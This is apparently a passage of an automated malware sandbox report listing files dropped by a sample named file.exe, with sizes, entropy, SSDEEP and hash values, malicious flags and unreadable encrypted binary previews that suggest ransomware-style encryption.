          Preview:mozLz. .}..F.v..{..P......I.?..2.8.G.....\&..a.F.?J.P......C....../...O.l.......j.&.J..K.1.....b.<k..v....B..G.....^A..%1W...f_....DG...;..\.'|..."...; `..y.B*+Lm..}...I..O.._P.xN....SG...&O..9}.d....5...8 "RW..*cg...F.&N....s.B..{?.'....gv.x......y.. ...h..T.M....>...\.....0..m.jk....%........Ws.i...5...Xz.9.t=.1.|[..2.H..!,/.uJ..L.... ..nZp..+}B.G.B6[.v.K..RPN......~.S.<"..OF....Y..=.z0....oG(.[...q.....Q..W.....u+.YHg...|.(.d4.^...>..B..oEQ2.h....P=.?.$.Z....^..aq.8.nJ'pu........=....]m......?!...R..N..3^Fg.r.....x?.....3Y.(.=..;..8..D..h...l.{.. .._G5\)b..5..*..^e.....L0.v.eM.G.....Z.z..`....f.KP.e,...c.H.^U...%...[)]..'..4.c.:c.*.j....M+~N....H.(..d&q.n...|..D!.(5.d.....N.p..1.....@c,......v....M7...Ykz..L5ml}.8........i..e.D.."...6...X._..0. ...1R.%t...*.3....K.Z_.T..KK.XK'[........1br....l.......;..&[.'>."..)..Y.d..S.=......(D-U....W......oE.`...S..K .{'Kp..w..'=.%.R.r........BvO{.<75o..x..<.`f.x.......d..;uw?&.{..[.2nJ.euug
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3919
          Entropy (8bit):7.950370451720799
          Encrypted:false
          SSDEEP:96:0GIOZgCGXgNyiX+FN/aR62MHlvgV0k6i3TLqkBL0JeYVWt:0GLg/X7iOFs6JlYjjLPLYbVg
          MD5:AC334E75B587112BCE6C4390F1B7272F
          SHA1:A8E2327422AF245E57FB24FA89126D50E7FE72D2
          SHA-256:C36E325032BC1D73FA8C9974F8387BCE19810170D4F5E5F31467791E7E7FD45C
          SHA-512:698E75B008D303C81681336440C89C5CCE115F72C11C8A8463CCF384D4540F30A841830400B7102FCE93F8D4882B04642CAACF2860BCB2F6811BBB22CFDEA6C5
          Malicious:false
          Preview:mozLz../...WB..J..h..7....Z...0.\..s.g.....\...@%K.8E..qS...r.D,...U.{S.6...y&...1..^r........~.2....jk.).,K..[.....Z....'.h{..P..,|Fq..8:^...o...M.gO*....\..h=.......[....G.....3S.C..hR..jU..?]wP..C....rqC..50{.T&.1..(.815..\.\..O3.hd..o.F=....=..?.#.L^....r.....n.......z.*4..G.^z.....D..L!.4)F[7......N....~.....M....\....F2....nY..?1v.......gY.^/...B.~..3..<........Nt........T.:.....*gI.....b..=..M..y....[:..G=Xn1...G~DI.,u....Im..A{.....?...w<.Z.l........aq7.......O.RU..Q:gk...jB.W..c,.$..,5..`^....+vM8.'........B....i.n.J..K-..S.g..R|D.n.+..v..-....z.t.......p...n*....!.I.u......j......M.C...*..C....DHV[.6T...*..W....uMh.M...sD..&.6x'8D"....qp>....[._..H.r.B..^j2..../_.....;...*.i..:P"Q."v..\..;[j......m.$..@'..t.e......-.4......H..Pd....c#.w.....N......8b..,....Q,.m..rv-T4.9....Lbu./....,..,.)....C.nB5~X.K.c....;.o.4.U.h.O..F_.....9....V.\_.TyI/.|.Z....F...S....2..wN0[.MA..X`..5`F.K....(..\....;.T.z#.7....dv...5lUF......}.o...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):13932
          Entropy (8bit):7.986635196958483
          Encrypted:false
          SSDEEP:384:esPF/Qr6C33oN++qhWQmz28QZN4hNdAIIp+:eAFoWA3y++qhroNrIw
          MD5:72242D62EAC3EA80AB912CBA3C7C3DF9
          SHA1:7B6B73CBDCC9AC1CD02EB85BCE977249A741607F
          SHA-256:FA80C02A0970C9926B0D3FBA3B56FF19149C7686FD4F558643AF34D03EACE304
          SHA-512:52423FB7D78532D2627AA86A1BA1E41877B20B180CE3DE16FF1C01BE10546731842726E06CC94978002963DF1BD49231E216DCCF0E1798DC2D32D81619DBB82F
          Malicious:false
          Preview:mozLz..O.^D2uU...'..o..7...BS.x...?..Z..D..i...I..0....+......".`.F..P...I..r\x.W..${k.^<4.?w..Y..SR.....$:O..t.......VjZbp....M..v.]hy..w{.9d.Z7t...>r.t!.:..;Iv......;..b.'....cq.'kM-.2,...*4.V+6$.&....T.j..K.b..`.j.uL(....b...Kh;.m..q..8...p.A.u.o..z..="....X..Ls.?.......i9g....N..@..@..._z...W.s(`.#D....w...:...-.].h+.-..!r(.y..... .$..3..0,.4s3M].f...(.~.....F*,........F.e....9-s....7A!.8...>4...J.0.G@-...Y...!(......}..hd..=^.a.....}.......s..+...=...Ka!..\.>..@A..c$..UAR8..._C.......b.<<..`AE.u8...u.Z..M.o.Q...>.4...&....k&Jk.Y:.d..L.:c.a.....o...5}Tv.x.].f.:..=)Ne....$\.Z0S..-..?..B...x..Mz.I.c.Lp7S.oAsPJ%..l.C.J.j5l.c......6._F.....(n.P...{v..&.Ya>lFd.e..0&....ja...%8WQ...$.v.0..M.../.0...R.|.?].n.|.L......t6j*....=.c..(..G. /...P...O.^....s.RE.C....>...!..R..8.../.fn..s..G..,......w.I0,.i....<0 ...,.E..v....5dd............`O.D........$K....i.8."6...5....... ...r?f.6....9F%I.k..h ..m.<.A.<zl..J.....M..>.}.......8a..pfc6..4.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):13928
          Entropy (8bit):7.987744248884739
          Encrypted:false
          SSDEEP:192:vvYP7fdD4l1klfDaalPCKXcZK2a9sph5Q34sLB7EWI3B2fqoULqSKMqofu4ilBAb:vv40ClfDllPjcKqhm7FIoYuSb1fuz6
          MD5:95C05287CD1A927E406427E7F8CE4009
          SHA1:92B15F99A6BF10359A273EAF026DE7BF5477A7AD
          SHA-256:A098FD1655B5CDFD240B25DC0258472D3C8DEE64275834990F421FE2AD985A4A
          SHA-512:5A0C6AB93C37A5BF31F87436D6C7B0046EE0018DBAC2E485C494B7E8674784F484AFB873FBF3FA85C0D93ED3FB0650C163165925BED2C7ED12FB72D73842EA7A
          Malicious:false
          Preview:mozLz(...3..iA.&..['......^..........q.i...E..k.......T.B.mU...q....(..;....<.pY.H.?Y...=c..(.H....6......Z!{B.d.c}l.El.f..I.V....#....d5u .."X1._.^.....j....C......3M..m..^#$.OW........6]+.s6^.q.Md...........@g.._UG.._3........j+.PC..S90..........18.H.K...../...n.EP../m..r~.b......L...@....g.I..W...Va....u..3.;.2F....P.,z.-7......8.a......K......w....m.]._..HV.y=.....=...p.....Z.k...W.LW&....T..3...%..s..s..{.k.........J*.Ef..+....<~.....T#.z..54vLO.F.Z....A....v,....M... ..K.W...e....l...dk.Q$.#4.......q.8)$%<.r.l%}..S~..9.....*i;.l.u9Kh.[.w..&.........../..X..P...o..YJ..../V..?Jjw.J.R....y...7.~..L.........._.r.9W......k."R....f0r......>.o..\*.../.k.....p..Ll....4a......g..Y...d.32Et._,qf....:.."....p...._.W]!.....zP.._...:.mF..*.UO..5..m...C.X.7.......vf.........+a.[l.....PP.sC.ot..`6.r..7...4..p....C.a..d..R.....L....y..7..6B.-..Np.......5.K.Q.<.a....FK..".._..Z^.7..l......0........U..c.+.'..2au.........H....|..hl.....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):779
          Entropy (8bit):7.7554359629965015
          Encrypted:false
          SSDEEP:24:JjOAapXYm77r2R9MpxZgIV7pvrKa+nPvnAovaorEIiTkbD:ddGYK4OpxZX7pvrKZPvASrGiD
          MD5:F7D35AA457395C7F7D6E658504531B6E
          SHA1:053136F5A65A1B02F1E9A0D4104E8A77DE6BEE5C
          SHA-256:A1125176B132EF99342FF16EE8C5E93A7D0D2474DFFE4D586A03E21BFC565068
          SHA-512:1E58AF6E51DBD1629B96EB21D70757D0FE2206FA56FEDBA103DF95D659EF76504E012B5B57319BA5A001F8647E9CA400AF312767EFCE6AA82D6E43FB14B77502
          Malicious:false
          Preview:mozLz^.L.{.t...1..u...C}SV.~L.`...y[.....e.L8.6.`.1.f......gvo&*.uR....O.M...D.'&=...#j....x>T..t.N....F......k-......_m.&I....A..$.@V'..k.:..y{.<..7..6..hW/9.,l~....\<.B...A+...m.....bv.....4+..t...~..XZ.z../XK....3z..I..|.d...4..@>......"G...uA................ZN...JU.s=..V....$.Pt..K87.!.w....$(.s.8....s.2J.D..<..|.....S;a.A..<.3.~..8.\:]<.q..N.0......c...{..$...'.z2T....l8H........AI.6.;.~Dw6v.\...~..W...m..Qr=....)}.....Oi.C..,........._....Q...-..?.3b...Y..(........d..I....j.........M.p..l.{..i..O.Fs.8AK.....ml....J.J..Q..U...h..M.~.|....qu.p. ...!.....')...{.. .....E.{...m.fD.1_$..^.@.+ez..3D....b..?.OQ...JB_p<l...iX.g.....S...f.........9h.Ur6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):4682
          Entropy (8bit):7.953089772766319
          Encrypted:false
          SSDEEP:96:3NYQcMhO84UFrlNbtHWYiwGhLiwycEfBduQuZOQVgIZyv2G2tphv0pdObeabtuyP:HccFrPbtHWNpQsEfBdzuFdyv2HtQdhQr
          MD5:EA5E74332732C66E9967812138B4C506
          SHA1:943751802F78949F3734565EA8BE777B7C6C59CD
          SHA-256:CDC2AE99D0A70090AA937FC33C69C93D2180E6967D8B61CA7B8AC13AF3911BE7
          SHA-512:B73A8BECDA912297FE1D249959B675525BAE9DB1F8C646EBB5ECA4E0FA089F9E6C579CE6843A3A0B6FF29914F4C5C8BC99DF8A66E34A285B6DA7B7EDF89DF66F
          Malicious:false
          Preview:mozLz.E.m].r..f,'..j....5.L.|],...ix.$...:,..j...Vj.B}Z..V.>Z..;.d?:.K9....E.....]...sm..A..|U.......P.R.k........H.n....h...u....?.r...jt......l1....CA.o...^=U[~...dn...F.-.g..eP.F.........j.ipu.6..._.....e.s.r..O..a..T...<...rp.E.>.....m...;h...0F..?.I....5......F9-.=.n.pu.:./K`.u.U..7wY.L..wHS...o$z...p.C<.........E.....l..ru.of-o..@33?y.S.................!.HL..l.s#{+.........*>......<5|.w.cuH...NzF..@b....5U..XZh.O"^..^/.].<u..(U..5......oN..8{..I+6g.J.K..f...f..f...Z}....Q.>!Qv>....6.g.e.*.0.u.2.7..y.n%.0.t.J.2.#..r66...Q........@.A...........q.]....t_Nt.j...Q.>...8..^Pe.....6....A.b.B...^o...u.!)..P.?.......a.b.g.E.....,........ uu.,,.U....(..*.....yd.&.C0X.a.OqYD+...v.'*`G1..~.t.'.....\..K..Lk.#..W6...."`m..5....&..........I.Zp.K..\ ....(.vT....zO...B.......h.....c...>..]aq.lI......6.&..H..6]..jyU.E..I..z.....b...B.F........V.mn....Iy.M.......}.-Q!....Sq....L.....;z|...........7...H..h..p6...HZ.N.@..C......H.m.........
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):778
          Entropy (8bit):7.708235010146653
          Encrypted:false
          SSDEEP:12:VQDZ6v1YgXHzBtvVh56mMGsKn9NR0YitNJPFNBtLgfriixpZacii9a:VUIjXTr+GsK9f0Ykf/MuiTkbD
          MD5:C9511B90A167D633493D56678D2CF1F4
          SHA1:728CD5867E4C7D94125C83F457FB01E2F2D7D480
          SHA-256:5817C1335B1D4EBA66B1AD12D20C4B1BA84E4189D6241095448DB130BE55FCDE
          SHA-512:304D43A8AFC5F06E01EFD2411B51504B0A6FBE6AABDE3C7B7A9969FA1F215593D63BFFB3725EDFE68184488B5EA3C2CE44A982D4E29379D1D48197C467B6BB47
          Malicious:false
          Preview:mozLz.<.*....@.=.....@..O[.......M. .+...^.......,M..-..d.(E'..G.]J`....-zDF.RE0w6e.....&x.c....;).'.YP.n......16.....C.1.?X.(........ L........e,..^`.T../.m:..2:#j..WEl......4I..L..5.07.0.'/.<]m......|.....=C...1..$S...T......N.nI.....c....<...C.y......a-..&.6j..-Y&...t5.aH..}.e*.=...a.A....(.yX..;.d.v.....K..@-..o..j0_%.V$..0.8..>y....\.v..v.4?....<.d.o...:$....KL4.....M...{..........'g..1>....tW...RKZ...AOd.P..*..0.R.Q.eT..C...KZ.s.......P.......U.6.C.. ...........i......2.V0..p.2........|Q.f...;.!....2.ZY.....'.!...C..6.....I*m.J.;/..d.....c..8.u=.`9....q..w..h.....7V.8J...X..6..T.M.f(..I;.b.._m..$.....%h.7.....q.E}c._.H......1.'K[....y...._.)..9.j..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):15435
          Entropy (8bit):7.9881810417823225
          Encrypted:false
          SSDEEP:384:aTV1jCKzsWbp+XfoTzFBrQgBsjjB3JPxTqz6kdvAj:a51eKzsWbp9P/v+3/evaj
          MD5:022D780C8C7E2AD75207678EE2032C2B
          SHA1:6F348B13B878F7A37B28CBBF23EA82DA97E31819
          SHA-256:CB5998F2F12EC43C03A8ADFA9971F77096D56D37C91F0A8AB5039AA95EF60177
          SHA-512:426252FFEE2C670CABAAFA154551CDF6688A256B657948E62CF41C51F154D21CBDBE41C3DFC7665618A46339024090BE20706A73B7D33DF81E031CCA2EAC12F5
          Malicious:false
          Preview:mozLzE.U.......|>=ux.n6.y..o.~......0......MG.X4.,^7.BW.].}...N........S.m./<..h...,...!....e..[.n....f.a..".KiA....pT*....y.(......f..I......3i....J...1.$..J;.p...0k .....o..q.>f..Q.'...B.1.....f.......e...{.G6.......J.>.0B.<.-.....|..m.;Z..]p.....=.}.^'.`H.l..g.?.a...ks...8[ ..N..7.......a+.Wx...@4..q...w....B..+.Jd@;X..x{.Gu.......siC`Q*.,.w....B.Q_.........S.-...h...U..".+....L....z..(.e.}a....#R..drN..zc5..b.D....=2.dT..]...c8p...?ls....>0z......[.....S.-z...*].....c.\0~.~>D|7+c*.7M5!.H...zX_?...b.CDu.x.m.]..e....v.6...hE........5....?..m.f.y..K5).......A0../*...O8.n.q6=.0.B:D..M.]T..E....)l......{...:Zh.{.W..a.^7w.....jj..L.\.(..cO.Q.Ph.Z.V...y..\.4@.v.G.(@..5(.+..-9.I..G...k.|.#y....I...DI..1?..9..>.R....(.qZG..<[....'L.`VU..-....b!Ws..G.c.[..i.........=..z.......T.B.L.O.*..46.2..u....Z....nU-....8.]...'.8f..M?4.kiX.P....s..q^x.&;a.q.5S...-.W...)....F4c..t....v...u.e/.......kY)z`.........Vt\.C;.....H\+7V...LQ.dA..].N.._...c.tH..m.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):12839
          Entropy (8bit):7.984094640958794
          Encrypted:false
          SSDEEP:384:ZEgAZXhSDhNJG02ran0EoGvWB1ZNQBz6O/Gc:Z2k1rn0cvqNSz68Gc
          MD5:1D5F3B8626A0D3E112287328B59396C2
          SHA1:BADBBE82158F2A5C587F89E7D2A33064FF766D63
          SHA-256:9E231831751A9C081FB755B8F101AD601BA0B3DFECD6C03A36ABAEBC07219372
          SHA-512:A04B7D050E4953F00186FD1776C628D7E8D588B07FF4C3063AB725CDAE6571963DA3ED39CD0F0B0901B781C198D0CA3D059E5EBE574509B8EFBB1AD053FC886C
          Malicious:false
          Preview:.....4Fpk$.............2e<$.. ).%...!.P...<&.C....m...t...z..-....z...A.`9.7(uP;....[.....V...o...4..pBwR...A..R..j.1...so...W=\...z.rC.wP=5......A..`^.C...+.y.^.....7........Y...iI...o.).Z..._.d....N.....\5.W...m....<Fh.../Z.0..wrW.r...c.1|.s.9[.....mD.N.n..w.....Q..@..(..Cn..]....S}.o.5..?...."....w.lc...^..2..h.i.gC^rXK.@5%Y.w..pk..A/v.....18$q5....Yj..#.G..0.so\./..J..l..........9....H........T.J:....p..tP.s.....fV.%...=...N).uu.......F.VR>..hm.[F.g.X..1o.....@...QZ.....e.._..E7,....X...J....J.1X)..&..cI..e..:).O.c^.&....*..!.{.l..B.%E..?.*...=...!H.qf..D\.d...Q....;1.,..p<.E.../W5.T.....z*.`.i.L.y..j.&^C^t..W.UU.Q.h_.....;...Py,S5.z|..:...9r.....@'1..N3...U.J....E.k.9....t.9.&..!..S../.U.4..`O#..\[7ziS.f..l..];&{....*.....x..LZ'...y.......0S...Oh.8...3.f>.].o.F........}=......v........v.L..D......A..T3R.E........&.Sdl.s#.>..\....''y....8B.}....t}0B.l.\..(<0...M..r!4.....-^..E._W.@...........g...Px.i...8....taX.g4.y... .-.e0.Ln.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):495
          Entropy (8bit):7.551861908464994
          Encrypted:false
          SSDEEP:12:YWW2GCd28v1eXDq/DCD1g+f9iXn7+EwgUUh6KSvSoNOTixpZacii9a:Yt2i8yG/Dc1l9HgUUYBaiTkbD
          MD5:BE4A31F37B79AC13F816F8445CB111DF
          SHA1:7B33AD0B4B5F6B008696F8924C26C9E5907D790B
          SHA-256:E538DCE0175DEF4922E156020E4FBB6F1209C2FE7610AB157A176A448FCC0A62
          SHA-512:8789EA2145A6B624EF0805A9452CDDBEA999939A29362D3A52F64DD2B33C0AD98DB6367D3699A7FC249B978E3F553B5EC9A77E28D9D442A669AE5464873C5A07
          Malicious:false
          Preview:{"ses.#7r}8.(3...x.....z.s%.x...k.>8DZ2....aTw.Av.g......_w....."c.Hv.c......;]&c.k...!...s.....o.).......9..q..Q...W...h.w..N....&eR..0(V....H..v.i....H...L.#.....u..&O`..2.....Nx..1W.........^...3.k=..k....u....@}..p...D}.'%.t./3R.{..A?.AgExSykD.d../.e.....98...g.J...E...NC:....F..J.......K..Y..9.o)e.....N.fl.h9.K....<2b.5.N.....@..I.Th5.........}.'..!.N......n~T.....:A.,.*....F..f...../%F .r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):385
          Entropy (8bit):7.34032572443516
          Encrypted:false
          SSDEEP:12:YG7gNEIFYLtahS+vYgh141pN4HaqK0lixpZacii9a:YG5OYxaht141f4XiTkbD
          MD5:51404A00B910D101C295141ACC5C7166
          SHA1:9DEF873E745EA5AAEEC898F69AA4859F9F7231FD
          SHA-256:EFE087394C9533FDBE9158B41503A2CCB7F2051141DAEB5DA5D39D5F528DA374
          SHA-512:EBFF7BC2FBE3BBB81F4BE24D5687E511E0F3A3A46E90915DC963C257ADA7EED7DEA1647DC4CB349A4905CFD824974E828B57A0EC45A89DFDFA0C577081EA5494
          Malicious:false
          Preview:{"cliZ...{.w..&9Mz." .n...*..KgD........*...B.8.B>..rq..W9\@Zd...R.U..f.H.~.!._..B....=n.=...Aaq.Ja..-.)..U.>..L...<.i.w....G..h...V..x.M..J .gD............!+..?X...A4.U{.T.....S-.V..<..On...w..a>..M...$.z.T...*.....(......b.|FhDD.#f...u.....L.A.....".hv...jW.I...D..[.fL...e...-mL.GI...>.E.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1638
          Entropy (8bit):7.868454415094542
          Encrypted:false
          SSDEEP:48:/XOvbnGoRTYMIJqMAIYb8kLobJ2bTVrsiD:/yNRxGDYb8kLoFEJ7
          MD5:61413D6E4B5DF262E6800B51E2149645
          SHA1:8AA07D1E3BAE522C234FB066F8FFEAF11501D137
          SHA-256:19CCA51D915784A1A9810397227BF544DDA61FBA9C44C0A5D7C250A21CFFB184
          SHA-512:7C37C34F36291F5ADF747619D2453415EC2312596B3174AEEA08B5DF1B87BE07BD334E24FD1E151C855B0362C3DA14CA6C145B45A9310D8760759580E0569204
          Malicious:false
          Preview:mozLz..$.}.....f..QE..?....&.:..<.......1R..P..v."..X....'Z....(..8........j..I.l./.]..c~Lh...PK...k..:I.N).8.<...9.ywPF.e.S.M..%T..LJ....~..~7...@?....!..&o../U1...}...x.I.i..QN'..#.t.l..s.^....x.?e}.?B..Q.B.ne,./h..........q.....X...&s>w.s..#........._.?$...E.o.&&...&%...jN..l...uF..M.?.=.}?....f....+..V.....h..M|......e4.....%$s..s.b...D!..+;..2z.!.%..$[....g..d1...{..6......r..u......p.~5.z...0.F{.`.x..j...|(rD..tNR._jF.........u...K.4..."w ?../6/.V<`..g.....3Yq.#.=.i_z...2W!....O....h....%.....E..[.Tu./.6..M.1..mU.c..jj....2V...bE/v.<d....bD......&)e.[..rFl,..4).6...K.+......p.p9.G.<..eB.........2.A.6. ...c.W=V.....t.*.;|..}.B2...5...c.2N....._..].......L....9...7..pP...P.4aI-iWH.:.&..t...PV...C..}..s...Q........M.z?.4.h....h...Q..d%.gXn..r..&.B.*.%.J..q.QL9...!J..,....x..{O.(,..b.0..d.Vj..v.w.K(...j.e...p.........v}...T....Z[...R^..N].ajz[...o.b.......v.V..RH.....Tl..W.>...3..8..j=..?h......AX..6.A:.E...e..l....I.A..D
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1638
          Entropy (8bit):7.8853194759230645
          Encrypted:false
          SSDEEP:24:PtQREFIvY2bJ6fiulrIGABFYco8hK5gbz2mmQuOZVTDW5yaEdezbuT5GiiTkbD:XeA+SABFYco35gmfQjTDW5yaCePuWiD
          MD5:C4D912C7BF5278EF2E6514B8FDC9FDF9
          SHA1:7581862DFB0217B4E126FC7877605A993475B6BC
          SHA-256:148B87F44EB8F1A0F743F079FCBAAF3573F632DA41464BBD84638302962BE59E
          SHA-512:7A8C0083A4B26C8660B89E72AEABCD05027CC26391A8560DD2BC916429B86171FC7818B3798CBA43D28E0AEB41D895CBA67F97DE933A5DFC682F3D45B7307B28
          Malicious:false
          Preview:mozLziy.8%.Q........r....m@.y...........e....O..%....$_...gw.G....L.. [......l^...K0D.<.]..i..%..|..S....w..6F.....6.v.i'KG...}..M=.O..A.j...!...R.........UEw9..3.7.v.a........x...(#.M........fn.( *.a..B...9BN2..%i,.]w8.L...c....#..u..).%KL..@+8.cd.I4QO...............>.f.........ouj..R.d.......n......WLt.9.(.^.4X@..2....g.d~.)...f c....-l..Q..m.........}z..n..wn.R.=.....a..8......<..H pJ..;.e..-].../..>.....H...5!D>..P.Fj.o{....-S...qZ.bC....>.<>Q....-.0.Hk.=.u..;.!.pd.|.FY.o.Ka{0..1....g.5..7k.1.>..-..X............U...:.).1..!CZ..`...{.J.....1ic\h6..k...\.j.9m.k.6.......R....O..).. .4....d..e...m~.y.......V...4.y.fH...r......q._..3B.6..p..g..6O.i.D.....%..@....Y.T%....W.......:.I.q.(..!.K#4..*+........`......^./.!..t..x..3.......T...k....X......*..#.^..T.mF..+..T...\...6..k..vt0q"X.)..(M.....+...........7..H.NS.........t.!.$Aw........-. D..a..tUl.a.t#..&.$.A..$.s...Q..K....%.....l.q\[u.M._w.........=?".\AV.v....w....~.&.nT....b
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):131406
          Entropy (8bit):7.99864145613515
          Encrypted:true
          SSDEEP:3072:JhBhkb5lY6y6FSogv8Zl738+cChynqojIBYM4LiDuabzqGKgmn:z3g5lekXcChC8MeTTs
          MD5:BE8E670D9984317BA155599D5681CCC8
          SHA1:DC79DB82B979FDA0B3882EF43DA620C22BBF9DC1
          SHA-256:E07E2E79932E7C241E067718DBCEEC85A32E49C392AE66C92FF2FAC0A25B33B0
          SHA-512:A19A485D07A740C887AB20FAB6603FDEEEB2AE16F49908B8063348F790414F2FBC5B2620091A51F1BE4FCC22A1C108385A193B2C2D89FCBFB8F49D5C3692B471
          Malicious:true
          Preview:SQLitL..j.........o.."....ai@.V[...O.B.*....gP.7.[.{.........BP.......9%u.3..^_B.X....L....*....p...pW..\.;.C.....VX....3..rS3...U....x.../}iL.].?.?[s..0Zg.......-q....N%..L...T.yl/_.U.P.. ...K...J..'.M.......hi....G.%.H.4h........9~r.. )NS....!e_i.T'.v.gxo.....W.X...f.}>.....9.L.:....T.......G...g%b.p...D&.mc..........".:8......,...&G"...@.".R..T..TR3N..;..j~...Q=.pRh...c.d....n[....X.Bs-..4.W...)yT.!<.R......g....j...xt.B...4X.9#.@h.Z.U.....O..^.....-.Bm7.(.x.v}@[i`u..7....R)T..V9......?.3P..(.+.i....\.)F,...;..%..e.4..4.`...b=......;K.....-....w.aY..g..rB..0O..K......../.'......OK....`..^.td^.B..kUX@.~QQ1]I}._.3.n....o...#.j....yQ*..8o..9.J.K(.Z.'...^... ..]g..:.b..L.}..G..^E.~.B{C3....:......w..b.Sjd...a%....w.P..`.|d..\/.8...NG*_.A....'_O. b..t...2..W.O...S....dS&..._m.Q..s.e.t..Ry.x..Y...0.....=...N..2#5.az....^M.4.$.")......."...VN.......K.p.>....8..)..<r/..v.....?U...c<..j..o}.._..Z.9TEJ..W...%...l6..Q.,[-}.{.....).#p.*(u{.S.
          Process:C:\Users\user\Desktop\file.exe
          File Type:TTComp archive data, binary, 4K dictionary
          Category:dropped
          Size (bytes):370
          Entropy (8bit):7.333916327066733
          Encrypted:false
          SSDEEP:6:oLW+QVCWop+JbHT77k+A3RQj4vWp7BmwaB5T2xVoYDCws+SRLZjGxssZacii96Z:2abHP41vWp9mZ5QFns+uZixpZacii9a
          MD5:0BC61FBFF4D78FC83446982059528803
          SHA1:ACC3F0D40520AD40F900C7D9A4087F182A077BC1
          SHA-256:A651C6CE405A65D1169F9F04565864F3168AB0906E7DEF4AC7C5FE237F961C7F
          SHA-512:402054D0A9649603C9F1F8302111E40E532405C77BE18BFD339A67B6A5E17BD17D70C0FCA7D6405263DB0CBB2970343BB8DB9F17D56953EDF3B27AB52167B3B5
          Malicious:false
          Preview:.....b..-..u..L...A...;.H\X.E- ....2.......9.Q.....8&.-ev...2.......4..2...QX......."..R!.OY.....E.k..k..D.....p.0U.../..HD..)....g..qZ|S.e.$..../t.%h;........\..6.J..E..O..H.;........Qc.|....$...xyo..*...58...B..Ik~....6.........sg6..=(..gLu.EtR#&Q.... ....z.N....*PQ,w[.z.hUr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):49486
          Entropy (8bit):7.995983039168499
          Encrypted:true
          SSDEEP:768:70pdUrs2nHPuT/2MShDycI94A4twOtoxOkyd8YkZvjNevYIgCEo8fJ:70pdUYvT/2MShf6atw81hkZb4v5gjd
          MD5:232F43CF55605B7AB90A9FEEF1A38F5C
          SHA1:07C08197F86EF74C2445FA517EABDBEF8CA86FED
          SHA-256:E65BA4C4362B9870CF33FD99D415F10F84FCC0B4BE70B09A4EF1FDD77C61B906
          SHA-512:F4994985961F5D11C4DA8407279CDA22464987E4EFD7AB6D41B02F28A87F490099A850F7E7BA35717668FA7F0988E780B6820EF8A34B607BEDBAEE3E48ECD983
          Malicious:true
          Preview:SQLit"Db:wZ(.;...g.B'..x..je.6N.g.........2.,...x<...x.'...i.o.y..Yk...9n..n..0...K.g.$N../3..;...b.G./...4.n;..S..sb..~z.`p*v:;(]@..........V..Cb...~F...Z.a.u.$.)........z@.x.X...q.@\F..[B.......?ccGb..~...B...I'n>...pBS..+......K.W2....3......PB!G...y.~.K.w:.$f.T.J.h..'...KAb..y...;.c.\..$.._C.bdY.w3.Y*.....N...m..H..........)..3M.U..(;w.:d...(-K....h..N...E.....!.B...j..U..!j.I..u.t.z..o.c..h`....AXSL........Md.{...X^......1.x..\&<....=,....^~~..i@..+>....`...8.n..Sh..+..R...X......J.....C)5bj....Fu..H..>.#l.fg....5Uu..f@.B.8.(X.....*.T(..o...?.n-..={ Rw....1~..T.>t*....m.B/. .....7...&W..Xc......7O....K1....)....eYTjb.Tu."....WK.K..r.`.d.o.vqt..3..........W....$...n..sw.4.,.G.mX...&2b.N\.K).cv`-..c.c..)...!+y...Ld...............l..]......J.Chk...rVg.b.}....H.0.3.7 j......1m..g...TW..B...6 .....B,Ya\.....-_....8.c.....t.....Y..$..N.w....8..(..z....".....^uU_.....".Bi..Rt..1.I.[..O.!.~W..w.=.......$A$L.....X.@.5...1O ..GQ....3.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):33102
          Entropy (8bit):7.995319673969405
          Encrypted:true
          SSDEEP:768:ljKfJMJEgEkUlv19Ze+QUzWhjWLzkEdy342TfzP5MnxdBMW:IJZjkUlvkhSzBU3fzPWf
          MD5:3DABD0E2D7C448769FDF398930A5D1EA
          SHA1:D5D7714BFFE37C5E85D7E2EE9629196CA4967302
          SHA-256:E72C259FB1D0365B5D43F33E408442ED7C497BA9584436F790ECD9DE10E26118
          SHA-512:888247C222AC8A7B531DE57C0C882374BBBF1CDF426DE9D3F29AD29C4D5CE0B1F88CE4645DCF4634A0F48432FDAA5B44601EACCABFCD79D103D986772A2FFD0E
          Malicious:true
